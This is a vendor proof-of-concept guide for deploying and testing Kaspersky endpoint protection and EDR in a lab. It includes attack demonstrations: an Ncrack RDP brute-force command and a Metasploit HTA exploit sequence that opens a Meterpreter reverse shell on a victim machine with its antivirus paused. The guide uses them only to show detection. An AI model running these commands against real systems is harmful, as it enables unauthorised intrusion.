Kaspersky NEXT EDR Foundations and Optimum for Windows Proof of Concept guide Kaspersky 07.03.2024 Table of Contents Introduction ...................................................................................................................................................................3 About this document ..................................................................................................................................................3 What is Kaspersky NEXT EDR Foundations and Optimum for Windows .................................................................3 About Administration consoles ..................................................................................................................................4 Prepare the environment ..............................................................................................................................................5 Review the hardware and software requirements .....................................................................................................5 Download required files .............................................................................................................................................5 Configure network and check account permissions ..................................................................................................5 Setup and deploy ..........................................................................................................................................................6 Kaspersky Security Center and Kaspersky Security Center Web console (Expert View) deployment.....................6 Kaspersky Security Center Administration Server and Kaspersky Security Center Web console (Expert View) .6 Kaspersky Security Center Cloud Console (Expert View) ...................................................................................17 Kaspersky Endpoint Security Cloud (Pro View) ...................................................................................................17 Kaspersky Security Center configuration ................................................................................................................17 Deploy protection for Windows devices ..................................................................................................................24 Activation .................................................................................................................................................................28 Update .....................................................................................................................................................................28 Capability scenarios ....................................................................................................................................................29 Kaspersky NEXT EDR Foundations for Windows ...................................................................................................29 Web Threat Protection .........................................................................................................................................29 Network Threat Protection ...................................................................................................................................31 AMSI Protection ...................................................................................................................................................33 Exploit Prevention ................................................................................................................................................35 Web Control .........................................................................................................................................................39 Device Control ......................................................................................................................................................41 Anti-Bridging .........................................................................................................................................................43 Application Control ...............................................................................................................................................45 Kaspersky NEXT EDR Optimum for Windows ........................................................................................................51 EDR Optimum ......................................................................................................................................................51 Adaptive Anomaly Control ....................................................................................................................................61 Full Disk Encryption..............................................................................................................................................63 USB File Level Encryption with portable file manager .........................................................................................66 BitLocker management ........................................................................................................................................69 Appendix A: POC success criteria ..............................................................................................................................72 Appendix B: AMSI demonstration script .....................................................................................................................74 This guide relates to the following versions of Kaspersky products: • • • • Kaspersky Security Center 14.2 Kaspersky Security Center Cloud Console 15.0.152 Kaspersky Endpoint Security Cloud 24.6 Kaspersky Endpoint Security for Windows 12.4 Introduction About this document This guide is intended to help you quickly deploy and configure Kaspersky NEXT EDR Foundations and Optimum for Windows applications for evaluation. It guides you through detailed scenarios in a proof-of-concept environment to help you better understand how the solution works. The instructions provide an evaluation method to the most common use cases for endpoint security. This guide is intended for use by Kaspersky presales engineers and 3rd parties wishing to evaluate Kaspersky NEXT EDR Foundations and Optimum for Windows applications. It’s assumed that the reader has: 1. Experience in systems administration. 2. Basic knowledge of computer networking. What is Kaspersky NEXT EDR Foundations and Optimum for Windows Kaspersky NEXT EDR Foundations and Optimum for Windows solution is designed to protect physical, virtual, and cloud-based endpoints (desktops and servers), enhanced with EDR functionality, and includes the following products: • Kaspersky Endpoint Security for Windows (KES for Windows) – provides comprehensive computer protection against various types of threats, network, and phishing attacks. Each type of threat is handled by a dedicated component. Components can be enabled or disabled independently of one another, and their settings can be configured. It also serves as EDR Optimum endpoint agent. Detailed information about the application is available in Online Help. • Kaspersky Security Center (KSC) – is designed for the centralized execution of basic administration and maintenance tasks in an organization's network. The application provides the administrator with access to detailed information about the organization's network security level; it allows the configuration of all the components of protection built using Kaspersky applications. You can use Kaspersky Security Center in the following ways: • As an on-premises application1: In this case you install Kaspersky Security Center, including Administration Server, on a local device and manage the network security system through the Microsoft Management Console-based Administration Console (MMC) or Kaspersky Security Center Web Console (Expert View). • As a cloud service (Expert View (ex. Kaspersky Security Center Cloud Console2) or Pro View (ex. Kaspersky Endpoint Security Cloud3)): In this case Kaspersky Security Center is installed for you in the cloud environment and Kaspersky gives you access to the Administration Server as a service. You manage the network security system through the cloud-based Administration Consoles: Pro View (ex. Kaspersky Endpoint Security Cloud Console) or Expert View (ex. Kaspersky Security Center Cloud Console). 1 Detailed information is available in Online Help. 2 Detailed information is available in Online Help. 3 Detailed information is available in Online Help. About Administration consoles Kaspersky NEXT EDR Foundations and Optimum for Windows applications can be managed using 4 different consoles based on implementation scheme (cloud or on-premises) mentioned in previous part of this guide, so it is crucial to understand what these consoles are. Let’s look one more time: When KSC is installed on-premises: • • Microsoft Management Console-based Administration Console (MMC) Expert View (via Kaspersky Security Center Web Console) When KSC is a cloud service: • • Expert View (via Kaspersky Security Center Cloud Console) Pro View (via Kaspersky Endpoint Security Cloud Console) To sum up: Pro View is only available as cloud service, Expert View is available as on-premises installation and as cloud service, MMC console is only available as on-premises installation. Prepare the environment Review the hardware and software requirements Kaspersky Security Center 14.2 and Network Agent: https://support.kaspersky.com/help/KSC/14.2/enUS/96255.htm Kaspersky Security Center Cloud Console (Expert View): https://support.kaspersky.com/KSC/CloudConsole/enUS/166364.htm Kaspersky Endpoint Security Cloud Console (Pro View): https://support.kaspersky.com/Cloud/1.0/enUS/123619.htm Requirements for DBMS and Administration Server: https://support.kaspersky.com/help/KSC/14.2/enUS/92567.htm Kaspersky Endpoint Security 12.4 for Windows: https://support.kaspersky.com/KESWin/12.4/en-US/127972.htm Download required files Distribution packages for all Kaspersky applications for Endpoint Protection are available at https://www.kaspersky.com/small-to-medium-business-security/downloads/endpoint. Please download full distribution package for Kaspersky Security Center 14.2 for Windows. Installation packages for Kaspersky Endpoint Security for Windows can be downloaded and created directly from Kaspersky Security Center Administration Console, Kaspersky Security Center Web Console. Kaspersky Security Center Cloud Console or Kaspersky Endpoint Security Cloud Console. Configure network and check account permissions To be able to use all the Kaspersky NEXT EDR Foundations and Optimum for Windows features described in this guide, make sure that required ports are open on the hosts. In this guide on-premises installation with Expert View is used, so open ports accordingly. A full list of ports used in communication between Kaspersky applications are available at: https://support.kaspersky.com/help/KSC/14.2/en-US/158830.htm https://support.kaspersky.com/Cloud/1.0/en-US/208747.htm https://support.kaspersky.com/KSC/CloudConsole/en-US/158830.htm To install Kaspersky Security Center and/or a Network Agent, you must have the Administrator permissions on the computer on which you are installing the product 4. 4 More detailed information about account permissions required for Kaspersky Security Center operation is available in the Online Help. Setup and deploy This section describes the installation process for each Kaspersky NEXT EDR Foundations and Optimum for Windows component. To deploy endpoint protection with centralized management you need to perform the following steps: 1. Deploy Kaspersky Security Center in one of the following available options: a) Kaspersky Security Center Administration Server (on-premises) b) Register for Kaspersky Security Center Cloud Console (Expert View) c) Register for Kaspersky Endpoint Security Cloud (Pro View) 2. Deploy protection for Windows devices (Network Agent + Kaspersky Endpoint Security for Windows with the EDR component (for the Optimum tier license)) After successful installation of these applications, it is necessary to activate them and update antivirus databases. In this guide Kaspersky Security Center on-premises installation with Kaspersky Security Center Web Console (Expert View) is used. Kaspersky Security Center and Kaspersky Security Center Web console (Expert View) deployment Kaspersky Security Center Administration Server and Kaspersky Security Center Web console (Expert View) This section describes how to install the Administration Server component. In this guide Kaspersky Security Center on-premises installation with Kaspersky Security Center Web Console (Expert View) is used. 1. Run the Kaspersky Security Center installation file. You will see the following window. Select Install Kaspersky Security Center 14.2. 2. On the Welcome page click Next. 3. If the required version of .NET Framework is installed, then you can proceed to the next step. Otherwise, install it. 4. Accept the terms of the EULA and Privacy Policy and click Next. 5. Select the type of installation on the cluster. For the purposes of this guide, local installation is used. Select Locally (install on this device only). 6. Select the installation type. In this guide, it is the Custom type. Click Next. 7. Select the components to install. Mobile Device Management is not required, therefore do not select it. Click Next. 8. Select Install both Administration Consoles and click Next. 9. Specify an infrastructure size. In this guide, from 1001 to 5000 networked devices is selected. Click Next. 10. Select a database server type. Click Next. 11. Specify the MS SQL Server parameters. If you don’t have a MS SQL Server installed on your computer you can download and install it from the official Microsoft website. Click Next. 12. Choose an authentication mode. In this guide, the Microsoft Windows Authentication mode is used. 13. Specify a user account to start the Administration Server service. Or you can leave it by default. Click Next. 14. Specify an account for the Kaspersky Security Center services. Click Next. 15. Specify a shared folder to be created. Click Next. 16. Specify the Administration Server connection settings. Click Next. 17. Select the Administration Server address to connect. Click Next. 18. Click Install to start the installation process. 19. Select a language for installing Kaspersky Security Center Web Console. 20. On the Welcome page of Kaspersky Security Center Web Console Setup Wizard click Next. 21. Read and accept the terms of the EULA. 22. Specify the path to the installation folder. 23. Specify the Kaspersky Security Center Web Console connection settings. If you install Kaspersky Security Center Web Console on the same device as Kaspersky Security Center Administration Server, then leave the settings by default. 24. Select Use default accounts and click Next. 25. Generate a new certificate. 26. Add a list of trusted Administration Servers. If you use one local Administration Server, then you can proceed to the next step without modification of the settings on this step. 27. Don’t install Identity and Access Manager. 28. Click Install. 29. Make sure that the installation completed successfully. Click Finish to close the Wizard. 30. Wait for the installation to complete. Then choose whether to start either MMC-based Administration Console or Kaspersky Security Center Web Console. In this guide, Web Console is used. Click Finish. 31. Ignore the warning and proceed to the webpage. 32. Enter your credentials and click Sign in. After completing these steps, you have successfully installed Kaspersky Security Center Administration Server and Kaspersky Security Center Web Console (Expert View). Kaspersky Security Center Cloud Console (Expert View) For detailed information on how to register your workspace for Kaspersky Security Center Cloud Console (Expert View) and how to deploy Kaspersky endpoint protection to devices in your organization, please refer to the Kaspersky Security Center Cloud Console Deployment Guide 5. Kaspersky Endpoint Security Cloud (Pro View) For information on how to register your workspace for Kaspersky Endpoint Security Cloud (Pro View) please refer to official documentation: https://support.kaspersky.com/Cloud/1.0/en-US/187780.htm Kaspersky Security Center configuration Further process of Kaspersky Security Center configuration and Kaspersky endpoint protection deployment is similar for both Kaspersky Security Center Web Console on-premises (Expert View) and Kaspersky Security Center Cloud Console (Expert View). In this guide, you can find the instructions and screenshots prepared for Kaspersky Security Center Web Console (on-premises). 1. Accept the Hardening guide prompt. 5 You can request this guide from your local Kaspersky representative. 2. When you log in to the Kaspersky Security Center Web Console you may be presented with the tutorial. You can go through it or close it. The tutorial can always be launched from the Kaspersky Security Center Web Console. In this guide, we close the tutorial. The Quick Start Wizard now opens. Click Start to proceed to the next step. 3. Select to use either a direct connection to the Internet or through a proxy server. 4. On the Step 2 wait for completion of the check for required updates and click Next. 5. Check the boxes for the Areas of devices you want to protect and the OS of these devices. 6. Select the encryption key length to be used in solutions. In this guide, Strong encryption (256-bit) is used. 7. Select the web plug-ins for the managed applications to install. 8. Make sure the plug-ins were installed successfully. 9. Select the installation packages to be downloaded and created. In this guide, we automatically download and create installation packages for the following applications: 1. Kaspersky Endpoint Security for Windows; 2. Network Agent for Windows. 10. Select either to participate in KSN (recommended) or not. 11. Select whether to add an active license for applications. In this guide, we will do that later. 12. Define Update management settings and proceed to the next step. 13. At the bottom of the page click Create to create the tasks and policies for Kaspersky applications and wait for them to be created. Then click Next. 14. Specify an email address for error notifications and Transport Layer Security usage and versions. In this guide, the Do not use TLS option is used, because email notifications aren’t configured. In production environment it is recommended selecting the Always use TLS, check server certificate validity option. 15. Check that the initial network poll has completed successfully and proceed to the next step. 16. Clear the Run Protection Deployment Wizard flag and at the bottom of the page click Finish to close the Quick Start Wizard. 17. In Kaspersky Security Center Web Console go to Discovery & Deployment – Deployment & Assignment – Installation Packages. In the right pane switch to the In progress tab. You will see the installation packages for which you should accept the terms of the End User License Agreement (EULA). Click on all packages and accept the terms of EULA. 18. Click the Properties icon next to the Administration Server. 19. On the General tab go to License keys and in the right pane click Select under the Current license section. 20. Click +Add a new license key – specify your Activation Code and click Send – enable the Automatically distribute license key to managed devices option – click Close. 21. Select the added license key and close this window 22. Click Save to apply changes. After completing these steps, you have successfully performed initial configuration of Kaspersky Security Center. Deploy protection for Windows devices To deploy protection for Windows devices it is necessary to install: • • Network Agent (Kaspersky Security Center Administration Agent); Kaspersky Endpoint Security for Windows. These applications can be installed either locally or remotely by means of Kaspersky Security Center or 3rd party tools. This section shows the remote installation by the means of Kaspersky Security Center. 1. Open the Kaspersky Security Center Web Console. Go to Discovery & Deployment – Deployment & Assignment – Installation Packages. Click on the Kaspersky Endpoint Security for Windows installation package – Settings – and in the Data Encryption section check the boxes for all the encryption components as well as Endpoint Detection and Response Optimum component. Click Save. If you do not plan to go through Encrypton or EDR Optimum scenarios, you can skip this step. 2. Select the Kaspersky Endpoint Security for Windows installation package and click + Deploy. 3. Select the deployment method for the installation package. In this guide, Using the remote installation task is used. 4. Select the Network Agent for Windows distribution package to install it with Kaspersky Endpoint Security for Windows within one task. 5. Specify the devices for installation. By default network polling is performed immediately after Administration Server installation. 6. Specify the remote installation task settings. You can leave all the settings as they are by default 7. Select Do not restart the device. 8. Select Uninstall incompatible applications automatically. 9. Specify an administration group where the devices will be placed after the installation if needed. 10. Specify the account having permissions to install applications to the devices. 11. Click Run the task after the Wizard finishes and close the task creation wizard. The task will be started. 12. Wait for a few minutes. Go to Devices – Tasks – select the task you’ve just created and click Result. Check that the task has completed. After completing these steps, you have successfully installed Network Agent for Windows and Kaspersky Endpoint Security for Windows on the target Windows devices. Activation You can activate applications within the deployment process or during Kaspersky Security Center initial configuration. If you haven’t done this already, you can add a license key later with an activation task. More detailed information about licensing and activation is available in Online Help. Update After the installation of Kaspersky Endpoint Security application, you must update the databases in order to ensure you are using the latest bases and signatures. We recommend that you configure your update tasks to run on completion of the Download updates to the Administration Server repository task for Kaspersky Security Center Administration Server (on-premises) or When new updates are downloaded to the repository for Kaspersky Security Center Cloud Console. More detailed information about downloading and installing updates is available in the Online Help. Capability scenarios Kaspersky NEXT EDR Foundations for Windows The following scenarios are designed to help you experience the key features of Kaspersky applications for Windows devices within the Kaspersky NEXT EDR Foundations for Windows license bundle. They highlight the most important functionality and take you through how you can use these features in your own cases. You can go through them in any order or start with the one that you’re most interested in. a. b. c. d. e. f. g. h. Web Threat Protection Network Threat Protection AMSI Protection Provider Exploit Prevention Web Control Device Control Anti-Bridging Application Control Web Threat Protection In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows will protect your computer from the web threats. Evaluation steps: 1. Enable the Web Threat Protection component in the administration policy. 2. Try to access a malicious web-page (test page in this case). 3. Review the events. Expected results: Access to the malicious web-page will be blocked by the Web Threat Protection component. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane click on Web Threat Protection. 2. Check that Web Threat Protection is enabled. If not, enable it and close the policy properties. 3. On the protected machine open a web browser and try to access one of the following pages: https://www.kaspersky.com/test/wmuf https://www.kaspersky.com/test/aphish_h Check that they are blocked by Web Threat Protection. 4. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event. After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can protect the computer from web threats. Network Threat Protection In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can detect and block network attacks. For the purposes of this guide the Ncrack utility and Zenmap/Nmap are used to simulate RDP brute force attack and a port scanning respectively on a protected computer. You can find more information about using of these utilities on their official website. Evaluation steps: 1. 2. 3. 4. 5. Make sure that Network Threat Protection is enabled. Download and install Ncrack to the “attacker” computer. Perform the RDP brute force attack simulation on the protected system. Download Zenmap and perform the port scanning. Check the event log. Expected results: Network Threat Protection will detect the network attack and block the attacking computer. Instructions: 1. On the protected computer open Settings – System – Remote Desktop and turn on Enable Remote Desktop. 2. Switch to Kaspersky Security Center. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane click on Network Threat Protection. 3. Make sure Network Threat Protection is enabled. Otherwise, enable it. Enable the Treat port scanning and network flooding as attacks option. Set the following value for the Add the attacking computer to the list of blocked computers for min option: 1 min. Save and close the policy properties. 4. Download and install the Ncrack utility. Open a command prompt in the Ncrack utility installation folder. 5. Run the following command: ncrack -v win10pro64:3389 where win10pro64 is the name of the protected host. Usually you have to specify the files containing usernames and passwords as options, but for test purposes the command above also suits. 6. Wait for a while and press CTRL+C. Make sure that attack has been detecked and blocked. 7. Download and install the Zenmap utility or its command-line analogue Nmap. Run Zenmap and start an applicable port scanning against the protected host. 8. Make sure that the port scanning has been detected and you see the events in Monitoring – Reports – Network Threat Protection in the local Kaspersky Endpoint Security GUI. 9. You can also view the events in the Kaspersky Security Center Web Console. Go to Monitoring & Reporting – Event Selection – click Recent events. Check that there are events related to the recent network attack detection. In this scenario, we have demonstrated that Kaspersky Endpoint Security for Windows can detect and block network attacks. AMSI Protection Antimalware Scan Interface (AMSI) is a generic interface standard that allows applications and services to integrate with any antimalware product presented on a computer. It provides enhanced malware protection for users and their data, applications, and workloads. AMSI is an antimalware vendor agnostic, designed to allow for the most common malware scanning and protection techniques provided by today's antimalware products that can be integrated into applications. It supports a request/response structure allowing for file and memory or stream scanning, content source URL/IP reputation checks, and other techniques (source: https://msdn.microsoft.com/enus/library/windows/desktop/dn889587(v=vs.85).aspx). In Kaspersky Endpoint Security for Windows there is a dedicated component AMSI Protection. In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can detect malicious scripts using AMSI. Evaluation steps: 1. Create a sample script and try to run it. 2. Check the results. Expected results: Execution of the malicious script will be blocked and you will see the following message in PowerShell: This script contains malicious content and has been blocked by your antivirus software. Test succeeded. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane click on AMSI Protection. 2. Make sure AMSI Protection is enabled. Otherwise, enable it and close the policy properties. 3. Switch to a protected computer. Run PowerShell as Administrator and execute the following cmdlet: Set-ExecutionPolicy Bypass Press Y or A to procced. 4. Create a PowerShell script and paste the body of the script from Appendix B. This script is artificial and does not contain any malware. 5. Run the script in PowerShell. Check that its execution has been blocked. 6. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event. After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can detect malicious scripts using AMSI. Exploit Prevention In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows detects and blocks exploits. To do that we will use Metasploit Framework within Kali Linux. You can also download and install Metasploit Framework on your own computer from the following page: https://www.metasploit.com/download. In this scenario, we will use a web server that hosts an HTML Application (HTA) that when opened will run a payload (Meterpreter) via PowerShell. More information about the exploit is available by the following link: • https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server Note that this scenario is intended just for Proof of Concept purposes. DO NOT USE IT FOR OTHER MEANS! Environment description: • • Victim computer: fresh installation of Windows 10 21H1 (OS Build 19043.1766). Attacker host: Kali Linux 2022 with Metasploit Framework (https://www.kali.org/downloads/). Evaluation steps: 1. Stop the Kaspersky protection. 2. 3. 4. 5. Exploit a vulnerability. Resume protection and disable essential components of protection. Try to exploit the vulnerability. Check the results. Expected results: Kaspersky Endpoint Security for Windows will detect and block with the help of the Exploit Prevention component. Instructions: 1. On a victim computer right click on the Kaspersky Endpoint Security for Windows icon in the tray and click Pause protection and control… Also make sure that Windows Defender is disabled. 2. Switch to Kali Linux and start Metasploit Framework. In the Metasploit Framework console consequently run the following commands: use exploit/windows/misc/hta_server set target 1 set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.160.201.59 exploit where 1 means that target is PowerShell x64 and 10.160.201.59 is the IP address of Kali Linux. 3. Switch to a victim computer. Open browser and enter the highlighted IP address from the previous step in the address bar. In the window that appears, click Open to run a file. 4. Click Run to open the file. 5. Switch to Kali Linux. In the Metasploit Framework console note that the Meterpreter session opened. 6. Press Enter. Run the following command: sessions 2 where 2 is the number of the session. Then consequently enter shell calc.exe to show that we’ve successfully gained access over the victim computer and started the calculator. 7. Check that the calculator has started on the victim computer. 8. Sequentially type exit to close the Meterpreter session and jobs -K to stop all created jobs. 9. Switch to Kaspersky Security Center. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Essential Threat Protection section and in the right pane disable all the components in the section. Save the policy and close its properties. 10. Go to Devices – Managed Devices. Double-click on a victim computer – Applications. In the right pane select Kaspersky Endpoint Security for Windows and resume protection. Close the properties of the victim computer. 11. Switch to Kali Linux. Repeat steps 2-4 of this scenario to exploit the vulnerability. 12. Note that the exploit has been detected and blocked. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event. After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can detect and block exploits. Web Control Many companies are concerned about their Internet traffic consumption. When analyzing the company Internet traffic, security administrators may want to deny users from visiting social networks. This can be done with Web Control available in Kaspersky Endpoint Security for Windows. In this evaluation scenario, we will block access to social networks for all users. Evaluation steps: 1. Configure and apply the policy. 2. Attempt to access restricted web-resource from the user’s computer. Expected results: Access to a specified site is blocked. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Web Control. 2. Make sure that Web Control is enabled and click + Add in the Rule List section. 3. Specify the rule parameters. Name: Social Networks Status: Active Action: Block Filter type: By content categories Content category: Internet communication – Social networks Addresses: Apply to all addresses Users: Apply to all users Rule schedule: Always. Save the rule and apply the policy. 4. Switch to a managed device. Try to access facebook.com from a protected machine. You will see the Access Denied banner. 5. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event. After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can block access to forbidden category of resources. Device Control In this scenario, we will demonstrate how to restrict the use of certain types of devices on managed computers using Kaspersky Endpoint Security for Windows. Evaluation steps: 1. Configure a policy to restrict using CD/DVD drives. 2. Insert a disk to a CD/DVD drive of the protected system. 3. Review the event log. Expected results: Use of the CD/DVD drive will be blocked by Kaspersky Endpoint Security for Windows. For most cases it is common to show the restriction for USB devices, however in a cloud environment it is easier to demonstrate the Device Control functionality for CD/DVD drives. The demonstration process is the same for USB devices and other types of devices. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Device Control. 2. Check that Device Control is enabled and click Access rules for devices and Wi-Fi networks. 3. Click on CD/DVD drives. 4. In the Configuring device access rule switch the type of access from Depends on bus to Block and save the policy changes. 5. Switch to a managed computer. Try to insert a CD/DVD disk or an iso image into a CD/DVD drive of the protected system. The use of the disk will be blocked and you will see a notification that operation with the device prohibited. 6. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event. After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can block access to forbidden types of devices. Anti-Bridging The Anti-Bridging feature in Kaspersky Endpoint Security for Windows prohibits the use of a network interface if another active network interface is presented in the system. So, you cannot create a network bridge between the interfaces. In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can block the simultaneous use of different network interfaces on the protected computer. Evaluation steps: 1. Enable 2 network interfaces of the same type on a protected device. 2. Enable the Anti-Bridging feature. 3. Check the results. Expected results: The use of the second network interface is denied by the Anti-Bridging feature. One of the network interfaces will be disabled after enabling the feature. Instructions: 1. Check that you have multiple network interfaces enabled. 2. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Device Control. 3. In the Device Control properties click AntiBridging. 4. Enable Anti-Bridging and select the interfaces types to be affected. Save the changes and close the policy properties. 5. Once the policy’s applied, one of the network interfaces becomes disabled. 6. The active user will see the following notification. If you try to enable the disabled interface the other one will become disabled immediately. 7. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see the corresponding event. After completing these steps, you have successfully demonstrated that Kaspersky Endpoint Security for Windows can block the simultaneous use of different network interfaces on the protected computer. Application Control This scenario demonstrates how Application Control can block the launch of untrusted programs. In this scenario, you will configure the default deny policy with the minimum set of applications allowed to start. Then you will add the Internet browsers to the Allowlist. Evaluation steps: 1. 2. 3. 4. Configure a policy to enable default deny (Allowlist). Check that the startup of the application (Google Chrome) not in the Allowlist is blocked. Create a category for allowed applications and add it to the Allowlist. Check whether the application startup is blocked. Expected results: The launch of the application that is not in the Allowlist is blocked. After adding the application to the Allowlist, the launch of the application is allowed. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Application Control. 2. Activate Application Control; in the Action on starting applications blocked by rules section change setting to Block and change the Application Control Mode to Allowlist. Click Configure rules. Note that in a production environment it is recommended to test Application Control with the Test Mode enabled first. 3. Make sure that the Golden Image rule status is Enabled. Save and apply the policy. 4. Switch to a managed computer. Try to launch Google Chrome. Make sure the launch of Google Chrome is blocked and you see the following notification from Kaspersky Endpoint Security. 5. Open the Kaspersky Endpoint Security for Windows policy and go to the Application Control settings. Click Configure rules. 6. To add a new category to the Allowlist click +Add. 7. Click Choose a category. 8. In the Application categories window click +Add. 9. Specify the name of the category: Browsers. Select Category with content added manually. Data of executable files is manually added to the category. 10. In the Conditions section click +Add. 11. Select From KL category. 12. Select the Browsers group and click Next. 13. On the Conditions page click Next. On the Exclusions page click OK and confirm creation of the category. 14. Click OK twice at the bottom of the page. 15. Make sure that the rule for the Browsers category is in the Allowlist and it is enabled. Save the changes and close the policy. 16. Switch to the managed device and try to launch Google Chrome. Check that it works. After completing these steps, you have successfully demonstrated that using Kaspersky Endpoint Security for Windows you can block/allow startup of certain applications. Kaspersky NEXT EDR Optimum for Windows The following scenarios are designed to help you experience the key features of Kaspersky applications for Windows devices within the Kaspersky NEXT EDR Optimum for Windows license bundle. This license bundle contains all features from Kaspersky NEXT EDR Essentials for Windows as well as extra features described in this part of the document. Scenarios highlight the most important functionality and take you through how you can use these features in your own cases. You can go through them in any order or start with the one that you’re most interested in. a. b. c. d. e. EDR Optimum Adaptive Anomaly Control Full Disk Encryption Removable drives file level encryption with portable mode BitLocker management EDR Optimum The following scenario is designed to help you experience the features of Kaspersky Endpoint Detection and Response Optimum6. They highlight the most important functionality and take you through how you can use these features in your own case. Scenario overview: In this scenario let’s imagine that an attack is carried out by mailing to the organization's internal address list or in other ways. The file enters the organization’s infrastructure at users’ workstations. New malware arrives on the organization’s PCs. The endpoint protection on some PCs may have been turned off (partially or completely) or the signatures are outdated. On one PC KES is turned on and all protection components are operating. It detects new malware using Behavior Analysis technology and transfers the information to KSC using EDR Optimum. Information Security Officer works with the alert using KSC Web Console (Expert View) following guided response feature. Evaluation steps: 1. 2. 3. 4. 5. 6. 7. Enable EDR Alerts in KSC Web Console (Expert View). Enable the EDR Optimum component in policy. Emulate the attack. Run a test malware sample. Build a threat development chain graph, based on: hash file, exploit name, etc. Isolate the host. Prevent execution of another copy of the sample in future. Create an IoC scan task based on the detected threats and scan the entire network in order to check whether other hosts are affected. 8. Perform automatic isolation / file quarantine / scan task if other affected hosts were detected by IoC scan task. 9. Analyze file information on the Threat Intelligence Portal. 10. Disable the host isolation. Preparation: 6 Requires the NEXT EDR Optimum tier license Download the test sample: sw_test.exe7 to a target workstation. This is a synthetic malware that is not capable of doing harm, but its behavior is similar to a real malware. Instructions: Enable EDR Alerts in KSC Web Console 1. Log in to the KSC. Hover the mouse cursor over the login at the bottom of the screen and Interface options from the menu. 2. Toggle Show EDR alerts switch to enabled position and click Save button. Enable the EDR Optimum component 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application settings tab – Detection and Response section and in the right pane click on Endpoint detection and Response. 7 Contact a Kaspersky representative to request the latest version of the sample. 2. Toggle the Endpoint Detection and Response switch to ENABLED position. Toggle the Execution Prevention switch to ENABLED position. Select Block and write to report as the action on execution. Make sure that the padlocks toggles are switched to Enforce position. Click OK and the Save the policy. Emulate the attack 1. Open the sw_test.exe file location. Run sw_test.exe as administrator. 2. Open the KES interface and switch to the Reports section. 3. Open the Exploit Prevention event log. Note that a threat has been detected. 4. Log in to KSC and switch to the Alerts section. Find the corresponding alert and click More details. 5. The alert card opens. Here you can see a kill chain and other alert details. As part of the guided response there is a list of actions we recommend performing while working with the alert card. You can proceed working with alert card either using the guided response feature or by selecting the elements of threat development chain graph. We will use both methods below in this guide. Host Isolation 1. When you click Isolate a computer from the network link a dialog with description of the current step opens. Review the description and close the tip dialog. 2. Click Isolate computer from the network button and confirm the action by clicking OK button in the dialog window. 3. User will get a notification that his computer was isolated. Now if you try to open any web page you will see the browser error confirming that the network access is limited. Execution Prevention 1. Open the alert card and select the executable file in the threat development chain graph. 2. Click the Prevent execution button and confirm the action. The file hash will be automatically added to the prevention rule list. 3. Go to Devices – Policies & profiles section. Open the KES policy properties. 4. Open the Application settings tab, switch to Detection and Response section and click on the Endpoint Detection and Response link. 5. Note that the executable file was added to the prevention rules list. 6. On the managed device run sw_test.exe one more time. EDR Optimum blocks the startup of the application. IOC Scan Before proceeding with the following steps, copy sw_test.exe to another managed host. 1. Open the alert card and click Search a detected threat link from the recommendations list. Review the description and close the tip dialog. 2. Mark the checkbox next to sw_test.exe in the list. Click + Create IOC. 3. Set OR as scan condition; mark the following actions: - Isolate computer from the network - Move copy to Quarantine, delete object. Click Create task. You also can configure IOC scan to run critical areas scan or export IOC collection on this step. 4. Close the alert card and switch to Devices – Tasks section. Select the IOC Scan from alert: … task and start it. 5. Open the task properties and switch to the Results tab. Here you can see that the task was completed, and the indicators of compromise were found. 